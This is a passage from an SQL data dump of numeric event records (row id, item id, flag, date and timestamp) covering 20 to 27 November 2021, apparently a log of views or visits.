00:19:08'),(38631,4301,1,'2021-11-20','2021-11-20 03:25:20'),(38632,3664,1,'2021-11-20','2021-11-20 06:01:07'),(38633,1734,1,'2021-11-20','2021-11-20 06:51:27'),(38634,1734,1,'2021-11-20','2021-11-20 06:53:21'),(38635,72,1,'2021-11-20','2021-11-20 07:15:54'),(38636,1768,1,'2021-11-20','2021-11-20 07:16:39'),(38637,2309,1,'2021-11-20','2021-11-20 07:34:31'),(38638,2309,1,'2021-11-20','2021-11-20 07:34:34'),(38639,1718,1,'2021-11-20','2021-11-20 07:39:48'),(38640,2309,1,'2021-11-20','2021-11-20 08:01:11'),(38641,3752,1,'2021-11-20','2021-11-20 08:15:44'),(38642,1594,1,'2021-11-20','2021-11-20 08:28:04'),(38643,68,1,'2021-11-20','2021-11-20 09:02:42'),(38644,2309,1,'2021-11-20','2021-11-20 09:08:51'),(38645,3789,1,'2021-11-20','2021-11-20 11:26:31'),(38646,1718,1,'2021-11-20','2021-11-20 11:49:26'),(38647,3030,1,'2021-11-20','2021-11-20 12:24:12'),(38648,1586,1,'2021-11-20','2021-11-20 12:30:37'),(38649,2309,1,'2021-11-20','2021-11-20 13:19:01'),(38650,570,1,'2021-11-20','2021-11-20 13:27:14'),(38651,1766,1,'2021-11-20','2021-11-20 13:59:19'),(38652,472,1,'2021-11-20','2021-11-20 14:31:19'),(38653,2457,1,'2021-11-20','2021-11-20 14:43:40'),(38654,3127,1,'2021-11-20','2021-11-20 15:03:24'),(38655,1598,1,'2021-11-20','2021-11-20 15:13:23'),(38656,478,1,'2021-11-20','2021-11-20 15:57:32'),(38657,1608,1,'2021-11-20','2021-11-20 15:57:50'),(38658,4238,1,'2021-11-20','2021-11-20 16:13:51'),(38659,1594,1,'2021-11-20','2021-11-20 16:52:06'),(38660,108,1,'2021-11-20','2021-11-20 16:53:16'),(38661,4391,1,'2021-11-20','2021-11-20 16:58:52'),(38662,87,1,'2021-11-20','2021-11-20 17:27:55'),(38663,3030,1,'2021-11-20','2021-11-20 17:33:16'),(38664,2457,1,'2021-11-20','2021-11-20 18:35:31'),(38665,2804,1,'2021-11-20','2021-11-20 18:48:05'),(38666,2904,1,'2021-11-20','2021-11-20 19:42:43'),(38667,2309,1,'2021-11-20','2021-11-20 19:56:42'),(38668,3045,1,'2021-11-20','2021-11-20 19:57:08'),(38669,2309,1,'2021-11-20','2021-11-20 19:57:37'),(38670,1600,1,'2021-11-20','2021-11-20 20:31:02'),(38671,1600,1,'2021-11-20','2021-11-20 20:32:04'),(38672,1600,1,'2021-11-20','2021-11-20 20:35:15'),(38673,1600,1,'2021-11-20','2021-11-20 20:35:16'),(38674,1602,1,'2021-11-20','2021-11-20 20:38:49'),(38675,2457,1,'2021-11-20','2021-11-20 21:01:55'),(38676,1606,1,'2021-11-20','2021-11-20 21:02:06'),(38677,1606,1,'2021-11-20','2021-11-20 21:03:25'),(38678,2159,1,'2021-11-20','2021-11-20 21:07:21'),(38679,2159,1,'2021-11-20','2021-11-20 21:07:44'),(38680,1602,1,'2021-11-20','2021-11-20 21:14:24'),(38681,2309,1,'2021-11-20','2021-11-20 21:14:40'),(38682,1544,1,'2021-11-20','2021-11-20 21:17:00'),(38683,1602,1,'2021-11-20','2021-11-20 21:17:16'),(38684,4400,1,'2021-11-20','2021-11-20 21:40:19'),(38685,1588,1,'2021-11-20','2021-11-20 21:46:22'),(38686,1606,1,'2021-11-20','2021-11-20 21:47:18'),(38687,2309,1,'2021-11-20','2021-11-20 21:52:27'),(38688,1598,1,'2021-11-20','2021-11-20 22:07:04'),(38689,2309,1,'2021-11-20','2021-11-20 23:33:09'),(38690,2309,1,'2021-11-20','2021-11-20 23:40:40'),(38691,483,1,'2021-11-21','2021-11-21 02:32:45'),(38692,1602,1,'2021-11-21','2021-11-21 05:25:55'),(38693,1544,1,'2021-11-21','2021-11-21 08:04:59'),(38694,1718,1,'2021-11-21','2021-11-21 08:10:18'),(38695,1600,1,'2021-11-21','2021-11-21 08:16:28'),(38696,2309,1,'2021-11-21','2021-11-21 08:33:55'),(38697,108,1,'2021-11-21','2021-11-21 08:36:14'),(38698,1586,1,'2021-11-21','2021-11-21 10:00:32'),(38699,2309,1,'2021-11-21','2021-11-21 10:20:22'),(38700,1720,1,'2021-11-21','2021-11-21 11:54:24'),(38701,4238,1,'2021-11-21','2021-11-21 12:29:28'),(38702,470,1,'2021-11-21','2021-11-21 12:57:07'),(38703,1582,1,'2021-11-21','2021-11-21 13:15:23'),(38704,2309,1,'2021-11-21','2021-11-21 13:56:08'),(38705,2309,1,'2021-11-21','2021-11-21 14:02:27'),(38706,1544,1,'2021-11-21','2021-11-21 14:22:10'),(38707,1602,1,'2021-11-21','2021-11-21 14:23:24'),(38708,1544,1,'2021-11-21','2021-11-21 14:23:39'),(38709,1582,1,'2021-11-21','2021-11-21 14:49:51'),(38710,3710,1,'2021-11-21','2021-11-21 15:57:10'),(38711,1594,1,'2021-11-21','2021-11-21 17:47:02'),(38712,108,1,'2021-11-21','2021-11-21 17:49:14'),(38713,1602,1,'2021-11-21','2021-11-21 18:34:08'),(38714,4326,1,'2021-11-21','2021-11-21 18:34:45'),(38715,4326,1,'2021-11-21','2021-11-21 18:35:14'),(38716,2989,1,'2021-11-21','2021-11-21 20:00:09'),(38717,3030,1,'2021-11-21','2021-11-21 20:13:44'),(38718,2159,1,'2021-11-21','2021-11-21 20:35:19'),(38719,470,1,'2021-11-21','2021-11-21 20:42:33'),(38720,469,1,'2021-11-21','2021-11-21 20:47:02'),(38721,470,1,'2021-11-21','2021-11-21 20:47:54'),(38722,471,1,'2021-11-21','2021-11-21 20:48:02'),(38723,87,1,'2021-11-21','2021-11-21 20:49:03'),(38724,468,1,'2021-11-21','2021-11-21 20:49:50'),(38725,72,1,'2021-11-21','2021-11-21 20:54:07'),(38726,3102,1,'2021-11-21','2021-11-21 20:55:56'),(38727,1544,1,'2021-11-21','2021-11-21 22:39:13'),(38728,2159,1,'2021-11-21','2021-11-21 22:47:40'),(38729,4323,1,'2021-11-21','2021-11-21 23:26:53'),(38730,2309,1,'2021-11-21','2021-11-21 23:41:48'),(38731,1544,1,'2021-11-22','2021-11-22 00:23:02'),(38732,2309,1,'2021-11-22','2021-11-22 01:44:38'),(38733,3109,1,'2021-11-22','2021-11-22 01:48:03'),(38734,2804,1,'2021-11-22','2021-11-22 01:59:38'),(38735,4457,1,'2021-11-22','2021-11-22 02:10:07'),(38736,1600,1,'2021-11-22','2021-11-22 02:42:24'),(38737,1608,1,'2021-11-22','2021-11-22 04:27:27'),(38738,72,1,'2021-11-22','2021-11-22 04:40:25'),(38739,1734,1,'2021-11-22','2021-11-22 04:42:27'),(38740,106,1,'2021-11-22','2021-11-22 05:27:35'),(38741,3030,1,'2021-11-22','2021-11-22 06:23:38'),(38742,1586,1,'2021-11-22','2021-11-22 06:25:54'),(38743,1586,1,'2021-11-22','2021-11-22 06:27:36'),(38744,2410,1,'2021-11-22','2021-11-22 06:48:16'),(38745,4238,1,'2021-11-22','2021-11-22 06:48:50'),(38746,4238,1,'2021-11-22','2021-11-22 06:49:24'),(38747,3060,1,'2021-11-22','2021-11-22 07:08:08'),(38748,3060,1,'2021-11-22','2021-11-22 07:08:19'),(38749,1870,1,'2021-11-22','2021-11-22 07:31:41'),(38750,1612,1,'2021-11-22','2021-11-22 07:42:17'),(38751,1588,1,'2021-11-22','2021-11-22 07:53:47'),(38752,2457,1,'2021-11-22','2021-11-22 08:22:28'),(38753,2457,1,'2021-11-22','2021-11-22 08:22:42'),(38754,2457,1,'2021-11-22','2021-11-22 08:53:18'),(38755,4457,1,'2021-11-22','2021-11-22 09:37:22'),(38756,2395,1,'2021-11-22','2021-11-22 09:46:39'),(38757,1600,1,'2021-11-22','2021-11-22 09:48:15'),(38758,4335,1,'2021-11-22','2021-11-22 10:28:40'),(38759,3030,1,'2021-11-22','2021-11-22 11:29:25'),(38760,72,1,'2021-11-22','2021-11-22 13:14:16'),(38761,1602,1,'2021-11-22','2021-11-22 13:44:27'),(38762,84,1,'2021-11-22','2021-11-22 13:47:22'),(38763,1602,1,'2021-11-22','2021-11-22 13:47:48'),(38764,1600,1,'2021-11-22','2021-11-22 13:55:31'),(38765,2609,1,'2021-11-22','2021-11-22 14:45:17'),(38766,2609,1,'2021-11-22','2021-11-22 14:45:26'),(38767,2609,1,'2021-11-22','2021-11-22 14:45:34'),(38768,2609,1,'2021-11-22','2021-11-22 14:45:40'),(38769,2609,1,'2021-11-22','2021-11-22 14:49:56'),(38770,3691,1,'2021-11-22','2021-11-22 14:57:33'),(38771,3691,1,'2021-11-22','2021-11-22 15:13:03'),(38772,570,1,'2021-11-22','2021-11-22 15:28:03'),(38773,3534,1,'2021-11-22','2021-11-22 15:31:10'),(38774,1608,1,'2021-11-22','2021-11-22 15:40:45'),(38775,1608,1,'2021-11-22','2021-11-22 15:40:58'),(38776,1602,1,'2021-11-22','2021-11-22 15:41:37'),(38777,1608,1,'2021-11-22','2021-11-22 15:43:57'),(38778,4238,1,'2021-11-22','2021-11-22 15:59:08'),(38779,2457,1,'2021-11-22','2021-11-22 16:24:15'),(38780,2809,1,'2021-11-22','2021-11-22 17:20:53'),(38781,2809,1,'2021-11-22','2021-11-22 17:23:10'),(38782,2809,1,'2021-11-22','2021-11-22 17:23:22'),(38783,1582,1,'2021-11-22','2021-11-22 17:44:16'),(38784,1722,1,'2021-11-22','2021-11-22 17:48:34'),(38785,1722,1,'2021-11-22','2021-11-22 17:48:56'),(38786,1722,1,'2021-11-22','2021-11-22 17:53:17'),(38787,1722,1,'2021-11-22','2021-11-22 17:54:04'),(38788,1722,1,'2021-11-22','2021-11-22 17:54:07'),(38789,2161,1,'2021-11-22','2021-11-22 18:08:50'),(38790,1722,1,'2021-11-22','2021-11-22 18:16:17'),(38791,3691,1,'2021-11-22','2021-11-22 18:33:31'),(38792,4238,1,'2021-11-22','2021-11-22 19:06:19'),(38793,3087,1,'2021-11-22','2021-11-22 19:11:05'),(38794,2297,1,'2021-11-22','2021-11-22 19:11:10'),(38795,2297,1,'2021-11-22','2021-11-22 19:12:27'),(38796,1582,1,'2021-11-22','2021-11-22 19:14:32'),(38797,1582,1,'2021-11-22','2021-11-22 19:14:58'),(38798,4428,1,'2021-11-22','2021-11-22 19:27:27'),(38799,3060,1,'2021-11-22','2021-11-22 19:36:43'),(38800,3710,1,'2021-11-22','2021-11-22 20:02:21'),(38801,2159,1,'2021-11-22','2021-11-22 20:38:58'),(38802,2159,1,'2021-11-22','2021-11-22 20:39:05'),(38803,2159,1,'2021-11-22','2021-11-22 20:41:09'),(38804,2159,1,'2021-11-22','2021-11-22 20:41:26'),(38805,2159,1,'2021-11-22','2021-11-22 20:42:17'),(38806,2159,1,'2021-11-22','2021-11-22 20:42:23'),(38807,2159,1,'2021-11-22','2021-11-22 20:42:30'),(38808,2748,1,'2021-11-22','2021-11-22 20:49:52'),(38809,2748,1,'2021-11-22','2021-11-22 20:49:58'),(38810,80,1,'2021-11-22','2021-11-22 21:16:48'),(38811,80,1,'2021-11-22','2021-11-22 21:16:50'),(38812,80,1,'2021-11-22','2021-11-22 21:16:53'),(38813,3664,1,'2021-11-22','2021-11-22 21:32:13'),(38814,1600,1,'2021-11-22','2021-11-22 21:34:27'),(38815,72,1,'2021-11-22','2021-11-22 21:48:15'),(38816,2309,1,'2021-11-22','2021-11-22 22:06:06'),(38817,2309,1,'2021-11-22','2021-11-22 22:06:08'),(38818,3664,1,'2021-11-22','2021-11-22 22:21:47'),(38819,487,1,'2021-11-22','2021-11-22 23:05:26'),(38820,80,1,'2021-11-22','2021-11-22 23:09:47'),(38821,487,1,'2021-11-22','2021-11-22 23:09:57'),(38822,2309,1,'2021-11-22','2021-11-22 23:43:36'),(38823,1600,1,'2021-11-23','2021-11-23 00:40:26'),(38824,2161,1,'2021-11-23','2021-11-23 02:02:54'),(38825,3691,1,'2021-11-23','2021-11-23 02:18:38'),(38826,2309,1,'2021-11-23','2021-11-23 02:36:31'),(38827,2309,1,'2021-11-23','2021-11-23 03:36:08'),(38828,108,1,'2021-11-23','2021-11-23 04:50:14'),(38829,1544,1,'2021-11-23','2021-11-23 05:35:12'),(38830,1586,1,'2021-11-23','2021-11-23 06:00:37'),(38831,472,1,'2021-11-23','2021-11-23 06:09:40'),(38832,1598,1,'2021-11-23','2021-11-23 06:39:24'),(38833,72,1,'2021-11-23','2021-11-23 06:59:54'),(38834,68,1,'2021-11-23','2021-11-23 07:09:43'),(38835,3060,1,'2021-11-23','2021-11-23 07:34:01'),(38836,2813,1,'2021-11-23','2021-11-23 07:39:48'),(38837,570,1,'2021-11-23','2021-11-23 07:47:14'),(38838,1732,1,'2021-11-23','2021-11-23 08:44:34'),(38839,2457,1,'2021-11-23','2021-11-23 08:46:28'),(38840,1602,1,'2021-11-23','2021-11-23 09:16:29'),(38841,1612,1,'2021-11-23','2021-11-23 09:34:23'),(38842,4457,1,'2021-11-23','2021-11-23 09:47:05'),(38843,2991,1,'2021-11-23','2021-11-23 09:53:46'),(38844,1600,1,'2021-11-23','2021-11-23 10:11:13'),(38845,3278,1,'2021-11-23','2021-11-23 10:19:30'),(38846,1544,1,'2021-11-23','2021-11-23 10:26:53'),(38847,1544,1,'2021-11-23','2021-11-23 10:26:55'),(38848,76,1,'2021-11-23','2021-11-23 10:27:14'),(38849,2804,1,'2021-11-23','2021-11-23 11:31:46'),(38850,2503,1,'2021-11-23','2021-11-23 11:36:02'),(38851,72,1,'2021-11-23','2021-11-23 11:38:13'),(38852,3072,1,'2021-11-23','2021-11-23 11:51:28'),(38853,1699,1,'2021-11-23','2021-11-23 12:16:45'),(38854,467,1,'2021-11-23','2021-11-23 13:08:44'),(38855,2411,1,'2021-11-23','2021-11-23 13:50:21'),(38856,2419,1,'2021-11-23','2021-11-23 13:52:19'),(38857,4457,1,'2021-11-23','2021-11-23 13:58:06'),(38858,570,1,'2021-11-23','2021-11-23 14:11:10'),(38859,68,1,'2021-11-23','2021-11-23 14:54:21'),(38860,2309,1,'2021-11-23','2021-11-23 16:10:53'),(38861,1600,1,'2021-11-23','2021-11-23 16:18:55'),(38862,3124,1,'2021-11-23','2021-11-23 16:47:20'),(38863,1612,1,'2021-11-23','2021-11-23 16:57:09'),(38864,108,1,'2021-11-23','2021-11-23 16:57:53'),(38865,3030,1,'2021-11-23','2021-11-23 17:25:45'),(38866,2804,1,'2021-11-23','2021-11-23 17:44:12'),(38867,3030,1,'2021-11-23','2021-11-23 18:44:27'),(38868,2804,1,'2021-11-23','2021-11-23 18:49:10'),(38869,2804,1,'2021-11-23','2021-11-23 18:49:10'),(38870,74,1,'2021-11-23','2021-11-23 18:49:37'),(38871,74,1,'2021-11-23','2021-11-23 18:49:37'),(38872,1582,1,'2021-11-23','2021-11-23 18:50:12'),(38873,1598,1,'2021-11-23','2021-11-23 20:42:56'),(38874,3764,1,'2021-11-23','2021-11-23 22:09:01'),(38875,1602,1,'2021-11-23','2021-11-23 22:12:24'),(38876,2154,1,'2021-11-23','2021-11-23 23:12:30'),(38877,108,1,'2021-11-23','2021-11-23 23:21:04'),(38878,4457,1,'2021-11-24','2021-11-24 00:10:57'),(38879,1602,1,'2021-11-24','2021-11-24 00:11:00'),(38880,570,1,'2021-11-24','2021-11-24 00:11:35'),(38881,4457,1,'2021-11-24','2021-11-24 00:11:35'),(38882,91,1,'2021-11-24','2021-11-24 00:11:51'),(38883,4457,1,'2021-11-24','2021-11-24 00:12:10'),(38884,4440,1,'2021-11-24','2021-11-24 00:12:12'),(38885,570,1,'2021-11-24','2021-11-24 00:12:15'),(38886,4457,1,'2021-11-24','2021-11-24 00:12:38'),(38887,87,1,'2021-11-24','2021-11-24 00:12:50'),(38888,484,1,'2021-11-24','2021-11-24 00:12:59'),(38889,68,1,'2021-11-24','2021-11-24 00:13:13'),(38890,76,1,'2021-11-24','2021-11-24 00:13:44'),(38891,80,1,'2021-11-24','2021-11-24 00:14:02'),(38892,1594,1,'2021-11-24','2021-11-24 00:58:23'),(38893,80,1,'2021-11-24','2021-11-24 01:02:09'),(38894,570,1,'2021-11-24','2021-11-24 02:53:49'),(38895,3764,1,'2021-11-24','2021-11-24 03:30:30'),(38896,3764,1,'2021-11-24','2021-11-24 03:30:56'),(38897,3746,1,'2021-11-24','2021-11-24 03:39:07'),(38898,1699,1,'2021-11-24','2021-11-24 04:15:59'),(38899,1604,1,'2021-11-24','2021-11-24 05:00:49'),(38900,1606,1,'2021-11-24','2021-11-24 05:37:49'),(38901,1586,1,'2021-11-24','2021-11-24 05:52:45'),(38902,4301,1,'2021-11-24','2021-11-24 07:34:57'),(38903,1602,1,'2021-11-24','2021-11-24 08:01:05'),(38904,4457,1,'2021-11-24','2021-11-24 08:03:31'),(38905,1586,1,'2021-11-24','2021-11-24 08:31:19'),(38906,1602,1,'2021-11-24','2021-11-24 09:00:44'),(38907,3066,1,'2021-11-24','2021-11-24 09:06:42'),(38908,1608,1,'2021-11-24','2021-11-24 09:11:04'),(38909,4412,1,'2021-11-24','2021-11-24 09:15:53'),(38910,3752,1,'2021-11-24','2021-11-24 09:32:36'),(38911,68,1,'2021-11-24','2021-11-24 09:49:49'),(38912,68,1,'2021-11-24','2021-11-24 09:50:07'),(38913,76,1,'2021-11-24','2021-11-24 09:50:26'),(38914,80,1,'2021-11-24','2021-11-24 09:50:37'),(38915,68,1,'2021-11-24','2021-11-24 09:50:44'),(38916,2904,1,'2021-11-24','2021-11-24 09:54:03'),(38917,3752,1,'2021-11-24','2021-11-24 09:54:10'),(38918,2904,1,'2021-11-24','2021-11-24 09:54:24'),(38919,80,1,'2021-11-24','2021-11-24 09:54:37'),(38920,80,1,'2021-11-24','2021-11-24 09:57:00'),(38921,80,1,'2021-11-24','2021-11-24 09:57:00'),(38922,80,1,'2021-11-24','2021-11-24 09:57:22'),(38923,2411,1,'2021-11-24','2021-11-24 09:58:39'),(38924,72,1,'2021-11-24','2021-11-24 10:02:13'),(38925,72,1,'2021-11-24','2021-11-24 10:02:50'),(38926,4335,1,'2021-11-24','2021-11-24 10:03:53'),(38927,80,1,'2021-11-24','2021-11-24 10:33:27'),(38928,89,1,'2021-11-24','2021-11-24 10:35:37'),(38929,89,1,'2021-11-24','2021-11-24 10:35:52'),(38930,89,1,'2021-11-24','2021-11-24 10:36:09'),(38931,1588,1,'2021-11-24','2021-11-24 10:37:29'),(38932,91,1,'2021-11-24','2021-11-24 10:39:36'),(38933,4412,1,'2021-11-24','2021-11-24 10:42:44'),(38934,4412,1,'2021-11-24','2021-11-24 10:42:45'),(38935,1600,1,'2021-11-24','2021-11-24 11:17:09'),(38936,1602,1,'2021-11-24','2021-11-24 12:06:15'),(38937,1598,1,'2021-11-24','2021-11-24 12:25:55'),(38938,3541,1,'2021-11-24','2021-11-24 12:39:39'),(38939,1602,1,'2021-11-24','2021-11-24 13:22:38'),(38940,1602,1,'2021-11-24','2021-11-24 14:07:53'),(38941,80,1,'2021-11-24','2021-11-24 14:08:07'),(38942,1602,1,'2021-11-24','2021-11-24 14:09:51'),(38943,1600,1,'2021-11-24','2021-11-24 14:30:59'),(38944,2309,1,'2021-11-24','2021-11-24 14:43:04'),(38945,468,1,'2021-11-24','2021-11-24 14:52:06'),(38946,87,1,'2021-11-24','2021-11-24 14:52:45'),(38947,468,1,'2021-11-24','2021-11-24 14:53:19'),(38948,1600,1,'2021-11-24','2021-11-24 16:06:35'),(38949,91,1,'2021-11-24','2021-11-24 16:14:45'),(38950,91,1,'2021-11-24','2021-11-24 16:24:48'),(38951,2704,1,'2021-11-24','2021-11-24 16:40:16'),(38952,1695,1,'2021-11-24','2021-11-24 17:11:37'),(38953,478,1,'2021-11-24','2021-11-24 18:56:52'),(38954,4238,1,'2021-11-24','2021-11-24 19:02:58'),(38955,488,1,'2021-11-24','2021-11-24 19:13:26'),(38956,1582,1,'2021-11-24','2021-11-24 19:41:13'),(38957,3531,1,'2021-11-24','2021-11-24 19:44:47'),(38958,1582,1,'2021-11-24','2021-11-24 19:57:45'),(38959,1604,1,'2021-11-24','2021-11-24 20:21:02'),(38960,1604,1,'2021-11-24','2021-11-24 20:21:41'),(38961,3710,1,'2021-11-24','2021-11-24 20:26:36'),(38962,1592,1,'2021-11-24','2021-11-24 20:27:43'),(38963,1592,1,'2021-11-24','2021-11-24 20:28:41'),(38964,1872,1,'2021-11-24','2021-11-24 20:33:53'),(38965,2309,1,'2021-11-24','2021-11-24 21:40:58'),(38966,4400,1,'2021-11-24','2021-11-24 22:05:18'),(38967,1612,1,'2021-11-24','2021-11-24 22:13:26'),(38968,2309,1,'2021-11-24','2021-11-24 22:38:08'),(38969,2457,1,'2021-11-24','2021-11-24 22:40:37'),(38970,3267,1,'2021-11-24','2021-11-24 23:27:25'),(38971,2309,1,'2021-11-25','2021-11-25 00:02:28'),(38972,1582,1,'2021-11-25','2021-11-25 01:03:20'),(38973,2503,1,'2021-11-25','2021-11-25 01:19:00'),(38974,472,1,'2021-11-25','2021-11-25 03:10:24'),(38975,1774,1,'2021-11-25','2021-11-25 03:18:06'),(38976,3127,1,'2021-11-25','2021-11-25 03:30:23'),(38977,3045,1,'2021-11-25','2021-11-25 03:40:01'),(38978,1592,1,'2021-11-25','2021-11-25 04:14:24'),(38979,1600,1,'2021-11-25','2021-11-25 06:15:37'),(38980,1588,1,'2021-11-25','2021-11-25 06:57:59'),(38981,1604,1,'2021-11-25','2021-11-25 07:02:39'),(38982,3245,1,'2021-11-25','2021-11-25 07:09:44'),(38983,3030,1,'2021-11-25','2021-11-25 08:57:56'),(38984,3030,1,'2021-11-25','2021-11-25 08:57:59'),(38985,473,1,'2021-11-25','2021-11-25 09:28:14'),(38986,474,1,'2021-11-25','2021-11-25 09:28:14'),(38987,1602,1,'2021-11-25','2021-11-25 09:57:09'),(38988,1602,1,'2021-11-25','2021-11-25 09:58:15'),(38989,1602,1,'2021-11-25','2021-11-25 09:59:15'),(38990,469,1,'2021-11-25','2021-11-25 11:46:32'),(38991,4416,1,'2021-11-25','2021-11-25 12:21:14'),(38992,1586,1,'2021-11-25','2021-11-25 12:34:04'),(38993,2309,1,'2021-11-25','2021-11-25 12:41:56'),(38994,3104,1,'2021-11-25','2021-11-25 12:42:09'),(38995,2297,1,'2021-11-25','2021-11-25 12:44:56'),(38996,4420,1,'2021-11-25','2021-11-25 12:46:10'),(38997,1544,1,'2021-11-25','2021-11-25 12:53:08'),(38998,91,1,'2021-11-25','2021-11-25 12:57:30'),(38999,1602,1,'2021-11-25','2021-11-25 13:22:42'),(39000,1602,1,'2021-11-25','2021-11-25 13:22:46'),(39001,3127,1,'2021-11-25','2021-11-25 13:40:23'),(39002,2769,1,'2021-11-25','2021-11-25 14:11:04'),(39003,1724,1,'2021-11-25','2021-11-25 14:33:34'),(39004,108,1,'2021-11-25','2021-11-25 14:43:21'),(39005,1594,1,'2021-11-25','2021-11-25 15:02:47'),(39006,1594,1,'2021-11-25','2021-11-25 15:08:21'),(39007,87,1,'2021-11-25','2021-11-25 15:11:19'),(39008,87,1,'2021-11-25','2021-11-25 15:12:55'),(39009,1594,1,'2021-11-25','2021-11-25 15:15:22'),(39010,2309,1,'2021-11-25','2021-11-25 15:57:23'),(39011,469,1,'2021-11-25','2021-11-25 16:07:48'),(39012,3004,1,'2021-11-25','2021-11-25 16:32:33'),(39013,68,1,'2021-11-25','2021-11-25 16:34:15'),(39014,2769,1,'2021-11-25','2021-11-25 16:37:55'),(39015,1592,1,'2021-11-25','2021-11-25 16:52:43'),(39016,3285,1,'2021-11-25','2021-11-25 17:16:44'),(39017,4436,1,'2021-11-25','2021-11-25 17:21:07'),(39018,4436,1,'2021-11-25','2021-11-25 17:21:23'),(39019,3724,1,'2021-11-25','2021-11-25 17:35:41'),(39020,1592,1,'2021-11-25','2021-11-25 17:47:01'),(39021,1718,1,'2021-11-25','2021-11-25 18:31:46'),(39022,1600,1,'2021-11-25','2021-11-25 19:41:43'),(39023,1606,1,'2021-11-25','2021-11-25 21:23:12'),(39024,1718,1,'2021-11-25','2021-11-25 21:31:48'),(39025,1582,1,'2021-11-25','2021-11-25 21:50:50'),(39026,68,1,'2021-11-25','2021-11-25 22:01:46'),(39027,2309,1,'2021-11-25','2021-11-25 22:22:01'),(39028,2309,1,'2021-11-25','2021-11-25 22:23:00'),(39029,2309,1,'2021-11-25','2021-11-25 22:28:32'),(39030,1724,1,'2021-11-25','2021-11-25 22:41:18'),(39031,2309,1,'2021-11-25','2021-11-25 23:01:28'),(39032,469,1,'2021-11-26','2021-11-26 00:47:12'),(39033,2769,1,'2021-11-26','2021-11-26 02:16:45'),(39034,1600,1,'2021-11-26','2021-11-26 04:58:42'),(39035,2159,1,'2021-11-26','2021-11-26 05:15:51'),(39036,2159,1,'2021-11-26','2021-11-26 05:15:55'),(39037,2159,1,'2021-11-26','2021-11-26 05:15:56'),(39038,2309,1,'2021-11-26','2021-11-26 05:22:01'),(39039,2309,1,'2021-11-26','2021-11-26 05:22:01'),(39040,1600,1,'2021-11-26','2021-11-26 05:44:26'),(39041,1582,1,'2021-11-26','2021-11-26 06:00:07'),(39042,2309,1,'2021-11-26','2021-11-26 06:16:50'),(39043,3045,1,'2021-11-26','2021-11-26 06:18:53'),(39044,476,1,'2021-11-26','2021-11-26 07:24:45'),(39045,1772,1,'2021-11-26','2021-11-26 07:54:46'),(39046,1772,1,'2021-11-26','2021-11-26 07:55:27'),(39047,1772,1,'2021-11-26','2021-11-26 07:55:52'),(39048,1594,1,'2021-11-26','2021-11-26 08:45:46'),(39049,2148,1,'2021-11-26','2021-11-26 09:40:35'),(39050,2148,1,'2021-11-26','2021-11-26 09:40:45'),(39051,2148,1,'2021-11-26','2021-11-26 09:40:56'),(39052,1604,1,'2021-11-26','2021-11-26 10:04:22'),(39053,4238,1,'2021-11-26','2021-11-26 11:38:40'),(39054,1594,1,'2021-11-26','2021-11-26 12:12:48'),(39055,1604,1,'2021-11-26','2021-11-26 12:13:52'),(39056,1612,1,'2021-11-26','2021-11-26 12:57:58'),(39057,1612,1,'2021-11-26','2021-11-26 13:07:37'),(39058,1877,1,'2021-11-26','2021-11-26 13:21:27'),(39059,1872,1,'2021-11-26','2021-11-26 13:22:49'),(39060,1870,1,'2021-11-26','2021-11-26 13:23:41'),(39061,1600,1,'2021-11-26','2021-11-26 13:45:02'),(39062,1612,1,'2021-11-26','2021-11-26 13:59:02'),(39063,478,1,'2021-11-26','2021-11-26 14:18:02'),(39064,80,1,'2021-11-26','2021-11-26 14:27:32'),(39065,76,1,'2021-11-26','2021-11-26 14:47:53'),(39066,4457,1,'2021-11-26','2021-11-26 14:49:45'),(39067,1582,1,'2021-11-26','2021-11-26 14:54:16'),(39068,76,1,'2021-11-26','2021-11-26 15:00:59'),(39069,1600,1,'2021-11-26','2021-11-26 15:53:38'),(39070,1774,1,'2021-11-26','2021-11-26 16:24:28'),(39071,3706,1,'2021-11-26','2021-11-26 17:34:17'),(39072,2609,1,'2021-11-26','2021-11-26 17:57:17'),(39073,2309,1,'2021-11-26','2021-11-26 17:57:24'),(39074,2309,1,'2021-11-26','2021-11-26 17:57:28'),(39075,1774,1,'2021-11-26','2021-11-26 18:06:13'),(39076,2609,1,'2021-11-26','2021-11-26 18:15:49'),(39077,3714,1,'2021-11-26','2021-11-26 18:31:13'),(39078,1594,1,'2021-11-26','2021-11-26 18:41:44'),(39079,2813,1,'2021-11-26','2021-11-26 19:04:47'),(39080,3781,1,'2021-11-26','2021-11-26 19:27:17'),(39081,478,1,'2021-11-26','2021-11-26 19:38:24'),(39082,1602,1,'2021-11-26','2021-11-26 19:59:22'),(39083,4238,1,'2021-11-26','2021-11-26 20:22:20'),(39084,2309,1,'2021-11-26','2021-11-26 20:58:05'),(39085,1600,1,'2021-11-27','2021-11-27 01:05:51'),(39086,1594,1,'2021-11-27','2021-11-27 02:50:55'),(39087,2609,1,'2021-11-27','2021-11-27 03:47:13'),(39088,2609,1,'2021-11-27','2021-11-27 03:51:44'),(39089,2813,1,'2021-11-27','2021-11-27 04:05:59'),(39090,1598,1,'2021-11-27','2021-11-27 04:21:21'),(39091,3226,1,'2021-11-27','2021-11-27 04:35:52'),(39092,3287,1,'2021-11-27','2021-11-27 04:44:25'),(39093,1606,1,'2021-11-27','2021-11-27 04:48:52'),(39094,3482,1,'2021-11-27','2021-11-27 05:01:20'),(39095,4335,1,'2021-11-27','2021-11-27 05:29:56'),(39096,2309,1,'2021-11-27','2021-11-27 05:44:59'),(39097,3781,1,'2021-11-27','2021-11-27 06:04:45'),(39098,1588,1,'2021-11-27','2021-11-27 08:12:00'),(39099,3698,1,'2021-11-27','2021-11-27 08:13:21'),(39100,2457,1,'2021-11-27','2021-11-27 08:30:52'),(39101,3109,1,'2021-11-27','2021-11-27 08:53:45'),(39102,3245,1,'2021-11-27','2021-11-27 09:43:57'),(39103,1726,1,'2021-11-27','2021-11-27 10:49:17'),(39104,87,1,'2021-11-27','2021-11-27 11:23:55'),(39105,1604,1,'2021-11-27','2021-11-27 12:26:13'),(39106,1594,1,'2021-11-27','2021-11-27 12:46:06'),(39107,3482,1,'2021-11-27','2021-11-27 12:51:09'),(39108,1602,1,'2021-11-27','2021-11-27 13:19:31'),(39109,3072,1,'2021-11-27','2021-11-27 13:31:22'),(39110,3072,1,'2021-11-27','2021-11-27 13:33:51'),(39111,1612,1,'2021-11-27','2021-11-27 15:42:50'),(39112,2813,1,'2021-11-27','2021-11-27 15:43:44'),(39113,80,1,'2021-11-27','2021-11-27 16:16:49'),(39114,2309,1,'2021-11-27','2021-11-27 16:29:27'),(39115,2309,1,'2021-11-27','2021-11-27 16:29:30'),(39116,2309,1,'2021-11-27','2021-11-27 16:34:14'),(39117,1586,1,'2021-11-27','2021-11-27 